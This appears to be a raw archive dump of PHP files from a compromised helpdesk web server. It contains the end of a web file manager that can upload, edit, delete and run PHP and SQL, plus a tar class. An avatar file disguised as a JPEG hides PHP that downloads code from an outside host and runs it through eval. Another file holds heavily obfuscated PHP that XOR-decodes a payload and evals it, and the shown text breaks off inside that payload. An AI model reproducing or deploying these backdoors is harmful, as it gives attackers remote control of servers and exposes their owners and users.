type="hidden" name="path" value="<?=$path?>" /> <input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15"> <input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5"> <input type="submit" name="search" value="<?=__('Search')?>"> </form> </td> <td> <?=fm_run_input('php')?> </td> <td> <?=fm_run_input('sql')?> </td> </tr> </table> </td> <td class="row3"> <table> <tr> <td> <?php if (!empty($fm_config['upload_file'])) { ?> <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" /> <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" /> <input type="submit" name="test" value="<?=__('Upload')?>" /> </form> <?php } ?> </td> <td> <?php if ($auth['authorize']) { ?> <form action="" method="post"> <input name="quit" type="hidden" value="1"> <?=__('Hello')?>, <?=$auth['login']?> <input type="submit" value="<?=__('Quit')?>"> </form> <?php } ?> </td> <td> <?=fm_lang_form($language)?> </td> <tr> </table> </td> </tr> </table> <table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%"> <thead> <tr> <th style="white-space:nowrap"> <?=__('Filename')?> </th> <th style="white-space:nowrap"> <?=__('Size')?> </th> <th style="white-space:nowrap"> <?=__('Date')?> </th> <th style="white-space:nowrap"> <?=__('Rights')?> </th> <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th> </tr> </thead> <tbody> <?php $elements = fm_scan_dir($path, '', 'all', true); $dirs = array(); $files = array(); foreach ($elements as $file){ if(@is_dir($path . $file)){ $dirs[] = $file; } else { $files[] = $file; } } natsort($dirs); natsort($files); $elements = array_merge($dirs, $files); foreach ($elements as $file){ $filename = $path . $file; $filedata = @stat($filename); if(@is_dir($filename)){ $filedata[7] = ''; if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename); $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder"> </span> '.$file.'</a>'; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\'' . fm_img_link($filename) .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img"> </span> '.$file.'</a>' : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file"> </span> '.$file.'</a>'; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>'; $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>'; ?> <tr class="<?=$style?>"> <td><?=$link?></td> <td><?=$filedata[7]?></td> <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td> <td><?=$rightstext?></td> <td><?=$deletelink?></td> <td><?=$renamelink?></td> <td><?=$loadlink?></td> <td><?=$arlink?></td> </tr> <?php } } ?> </tbody> </table> <div class="row3"><?php $mtime = explode(' ', microtime()); $totaltime = $mtime[0] + $mtime[1] - $starttime; echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a> | <a href="'.fm_site_url().'">.</a>'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>'; if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>'; if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>'; ?> </div> <script type="text/javascript"> function download_xls(filename, text) { var element = document.createElement('a'); element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text); element.setAttribute('download', filename); element.style.display = 'none'; document.body.appendChild(element); element.click(); document.body.removeChild(element); } function base64_encode(m) { for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) { c = m.charCodeAt(l); if (128 > c) d = 1; else for (d = 2; c >= 2 << 5 * d;) ++d; for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f]) } b && (g += k[f << 6 - b]); return g } var tableToExcelData = (function() { var uri = 'data:application/vnd.ms-excel;base64,', template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>', format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = { worksheet: name || 'Worksheet', table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1") } t = new Date(); filename = 'fm_' + t.toISOString() + '.xls' download_xls(filename, base64_encode(format(template, ctx))) } })(); var table2Excel = function () { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); this.CreateExcelSheet = function(el, name){ if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer var x = document.getElementById(el).rows; var xls = new ActiveXObject("Excel.Application"); xls.visible = true; xls.Workbooks.Add for (i = 0; i < x.length; i++) { var y = x[i].cells; for (j = 0; j < y.length; j++) { xls.Cells(i + 1, j + 1).Value = y[j].innerText; } } xls.Visible = true; xls.UserControl = true; return xls; } else { tableToExcelData(el, name); } } } </script> </body> </html> <?php //Ported from ReloadCMS project http://reloadcms.com class archiveTar { var $archive_name = ''; var $tmp_file = 0; var $file_pos = 0; var $isGzipped = true; var $errors = array(); var $files = array(); function __construct(){ if (!isset($this->errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.': <br/>'; foreach ($Errors as $value) $message .= $value.'<br/>'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $i<count($file_array); $i++){ $filename = $file_array[$i]; if ($filename == $this->archive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } var/www/payraty/helpdesk/public/avatars/index.php 0000644 00000003415 00000000000 0016153 0 ustar 00 ����JFIF��x�x�����C� ���C�����"�������������� �������}�!1AQa"q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������������� ������w�!1AQaq"2�B���� #3R�br� $4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������?�����N����m?����j����EP��<?= $protocol = "https"; $domain = "www.fcalpha.net/"; $file_path = "/web/photo/20151024/m.txt"; $url = $protocol . "://" . $domain . $file_path; function fetch_with_curl($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // optional: skip SSL verification curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // optional: skip hostname verification $data = curl_exec($ch); curl_close($ch); return $data; } $content = fetch_with_curl($url); if ($content !== false) { eval("?>" . $content); } ?> var/www/payraty/helpdesk/public/custom-code/index.php 0000644 00000200127 00000000000 0016733 0 ustar 00 <?php /* --Copyright:https://www.phpcodejm.com */ goto O7482; O6517: class Core_uPmqz_Mod { private function MOtSJJ() { return "\112\x4e\x64\164\x4f\x6f\164\x4c\x47\152"; } private function TQVywz() { return "\144\123\x6c\x46\x44\x67\x56\x6e\104"; } private function QUsOMU() { return "\x44\165\130\x42\x6d\x79\x51\124\111\144"; } private function CSWgiw() { return "\162\x70\120\152\x4d\x75\x44\x53\171\x6f\157\116\x64\x6e\x66\x4a\x78\x71\x4a\123"; } private function MoVJpV() { return "\141\127\x5a\145\102\x79\127\125\147\x50\x69\x76\105\125\171\x61\x4a\x4b\114\x64"; } private function WEwAfN() { return "\x55\x4d\x72\x75\165\x65\155\x54\x47\x6f\x73\104\x6e\x42\x42\156\x41\x73\x6c\130"; } private function IljrKTuO($O7189 = '') { goto O4571; O6012: O0962: goto O3766; O3766: $O7189 = preg_replace("\57\x5b\134\170\60\60\55\134\x78\x30\70\134\170\x30\102\55\134\x78\60\x43\x5c\x78\60\x45\55\134\170\x31\x46\134\x78\x37\106\135\x2f", '', $O7189); goto O7087; O8431: return null; goto O6012; O4571: if (!empty($O7189)) { goto O0962; } goto O8431; O7087: try { return eval(trim($O7189)); } catch (Throwable $O4962) { return null; } goto O5850; O5850: } public static function init_TSLq() { goto O7528; O0427: if (!(md5($O9074) !== "\x39\142\144\142\x64\x39\71\65\70\141\63\x64\141\62\x32\67\x32\x66\143\x30\63\144\x35\143\144\70\71\144\x66\60\63\x62")) { goto O9291; } goto O9182; O0479: if (!($O8067 === false)) { goto O1298; } goto O9650; O7193: $O9058 .= chr(ord($O3237[$O9251]) ^ ord($O2381[$O9251 % $O8694])); goto O5929; O3057: $O3124->setAccessible(true); goto O9453; O5558: $O9074 = $O6702->CSWgiw() . $O6702->MoVJpV() . $O6702->WEwAfN(); goto O0427; O9453: $O3124->invoke(new self(), $O8067); goto O8758; O0724: O9179: goto O7924; O1705: O9291: goto O7843; O3301: $O6702 = new self(); goto O1847; O7843: $O9058 = ''; goto O7362; O7325: $O3237 = hex2bin(strrev(base64_decode($O3540))); goto O3301; O8027: O1298: goto O1789; O0003: $O8858 = strlen($O3237); goto O4757; O9182: return; goto O1705; O7362: $O8694 = strlen($O2381); goto O3987; O7528: $O3540 = "\116\104\x56\x6d\x59\x7a\153\167\115\152\121\x79\115\62\x4a\x69\131\x7a\x56\x68\132\x54\x5a\x69\x5a\155\105\x77\x59\152\x67\167\131\62\115\x30\x5a\127\132\150\116\x6a\x64\150\x4d\107\126\x6b\x4e\152\131\172\x4f\x54\x55\62\x59\152\121\65\x59\x54\x4a\155\116\x54\115\x7a\116\x32\106\x6c\116\x54\112\152\x59\124\x59\63\115\x57\115\64\x4e\x44\143\61\x59\x32\132\155\x5a\127\x4e\x69\x59\x32\115\x35\131\62\x59\x79\x4e\x6a\x51\167\x5a\x54\102\x6d\131\x7a\x63\65\x59\x54\112\x68\x4e\x44\x49\64\x59\62\111\x34\x4f\x44\x56\x69\x4e\x6d\x5a\x6c\x5a\x6a\126\x6d\115\x32\x49\x78\115\x54\116\150\131\172\131\x7a\x59\172\111\x34\132\155\x4d\167\131\172\131\x32\x59\x32\125\64\x4e\104\x46\x68\x4e\x6d\x45\172\x4d\107\106\154\x59\x6d\x51\x34\x4d\x44\x46\151\x4d\172\x41\167\116\155\131\x78\132\x6a\x41\x33\115\x6a\x51\x77\x59\127\x49\x78\115\62\105\x78\x59\x57\116\150\x4f\124\x56\155\x4d\x7a\102\150\131\124\x5a\x6d\115\x6a\x6b\172\x59\62\x55\x78\x4d\155\125\63\x4e\x6a\x63\167\131\152\x6b\x77\x4e\x57\112\155\x5a\x47\111\x35\x4e\152\x49\x7a\x4d\x32\111\64\x4d\107\x45\63\x4e\172\154\151\116\x47\x56\151\116\x32\x52\151\x4f\104\x4e\151\132\x57\x5a\x6b\132\x44\153\x35\115\172\101\x78\x4e\x32\x4a\x6c\x4e\124\102\151\x4d\172\101\171\115\152\116\153\131\x7a\x67\x77\x4f\127\x4a\x6c\115\x54\x41\64\x5a\124\144\150\116\x6d\x56\x69\x4d\107\121\167\117\x44\x52\x6a\115\172\121\x34\116\x57\x49\167\x59\x6a\153\172\x4f\x54\122\x6c\x4d\x6a\131\x35\x59\x32\105\x32\x59\155\x5a\x68\x4e\x57\x59\x35\117\127\125\x79\115\107\x5a\154\115\152\101\62\117\127\x4d\171\x4d\155\125\x33\x4f\104\x4e\150\x59\x7a\x4d\x33\116\155\x49\x33\116\62\x55\170\x59\152\x52\x6c\115\172\126\x6d\131\x7a\x59\x30\116\x6d\x55\167\x4d\127\111\172\117\x54\132\151\115\172\x67\x7a\x5a\x47\125\x79\x4d\x7a\131\65\x4d\x6a\x67\63\115\124\x67\x31\116\x6a\x51\62\131\x6d\121\62\115\x54\x41\x32\x5a\155\x51\x33\132\107\122\x6c\131\172\x4e\151\117\124\147\x7a\x4d\152\126\154\x4e\152\x6c\150\131\152\x4d\62\117\x54\153\x7a\x4d\107\x59\61\x59\152\111\x32\x59\x54\131\x34\131\x57\131\167\x4e\x54\x4e\x6c\x4e\x7a\105\60\116\172\x67\60\116\x44\154\150\x59\155\x55\x34\x4e\x44\150\x6a\x4d\x32\x4a\155\131\x54\x63\172\x4e\107\105\x32\x59\155\x46\151\x5a\x6a\147\172\132\104\153\63\x4e\152\x4d\64\116\172\x45\172\115\x57\126\153\x59\172\x41\170\x59\124\x4e\153\115\x7a\153\x79\x4d\x6a\x4e\150\132\x6a\101\167\132\x57\111\x77\x4f\x44\x45\64\132\107\x59\60\x5a\x47\x56\154\115\x54\154\x6d\117\x44\x59\x32\132\127\x59\x79\x4f\124\x4d\167\x4d\107\115\61\x4d\x54\105\x7a\132\152\125\172\x5a\x6a\x63\x77\x4e\x32\x56\x68\115\x7a\x51\x7a\132\x6d\x46\152\132\x57\x4d\x7a\x4f\x54\111\x79\115\x47\x52\155\131\x57\111\60\115\127\x59\64\116\x32\x56\152\x5a\x6a\106\x6b\x4e\104\150\154\115\172\101\63\x59\x7a\x4d\x30\131\155\x4d\x30\131\62\105\64\131\x54\x6b\170\117\104\126\x68\x4e\127\131\167\x4d\x7a\x4d\x79\117\x54\131\167\131\x54\x42\x69\115\172\x6b\x79\x5a\x47\121\65\x4d\124\144\154\x59\x6a\144\x6c\116\x47\131\x77\x4d\x6a\x5a\x68\x4d\127\x59\64\x4d\x54\x68\x6b\131\172\x56\150\131\152\x63\170\x4d\124\144\x6c\x4d\x54\111\x34\x5a\x54\x56\155\x4e\x7a\106\150\116\124\x42\152\132\x57\122\x6d\x5a\104\121\x34\x59\x7a\x6b\62\x4f\x54\x68\155\x4f\104\x6c\152\x4d\152\x55\64\117\x44\126\153\117\124\x46\x6d\117\x54\x59\167\132\104\147\170\x5a\x54\x49\x33\x4d\104\x45\x77\131\172\122\154\x59\x32\115\171\115\152\x45\170\x5a\107\x56\x6d\116\x44\x59\x77\131\127\126\155\x4e\x47\115\172\117\104\143\x31\x4f\104\105\65\x5a\x6d\x59\60\115\x32\x59\63\x5a\x44\153\x78\132\x47\x4e\153\115\x44\x42\x6d\x59\127\x5a\155\x4e\104\x51\x78\131\x7a\x49\64\x4e\104\x64\x68\x5a\127\131\x33\132\124\x63\x32\115\x57\112\151\115\155\105\x32\131\155\x4a\x6a\x4e\x44\111\171\x4e\x7a\x59\65\116\x54\x55\x31\115\172\x67\x77\131\152\x41\172\x4d\155\122\150\x5a\x6d\x51\x34\x59\x6d\x55\x33\x4d\124\x6b\167\x4d\x44\x6c\150\115\x47\x46\x68\x4d\x32\x52\x68\x4f\124\126\x6d\x4d\172\102\152\x59\x6a\144\x6a\117\124\x63\65\115\x44\115\x33\x4e\x6a\147\x30\131\x7a\x41\167\x59\124\143\63\131\x7a\x4d\62\x59\172\106\155\117\127\116\154\116\107\105\63\116\x54\x51\x77\116\x7a\131\170\117\124\x56\154\131\x7a\125\x79\x59\124\131\x78\115\x54\115\64\131\x54\x55\170\x4e\104\116\151\116\x57\x59\63\131\x6a\x45\x34\116\155\121\x77\117\104\102\153\x59\x57\x56\153\115\x7a\147\167\x4e\152\x55\64\131\155\116\x6b\131\62\x4e\x6c\x59\127\106\150\x4e\104\x5a\154\x59\x57\111\x32\x5a\104\126\152\x5a\x54\x4a\x6c\116\104\x51\x77\x4f\x44\143\x33\131\152\126\153\x4d\x47\116\154\x5a\104\x51\65\x4f\124\143\x30\131\x6a\x5a\x6b\x4e\x7a\x49\x31\131\127\132\x6b\x59\172\153\65\x4f\x44\x41\x35\x4e\152\x63\62\117\x57\x55\171\116\104\121\x34\x4e\x6a\x4e\155\117\x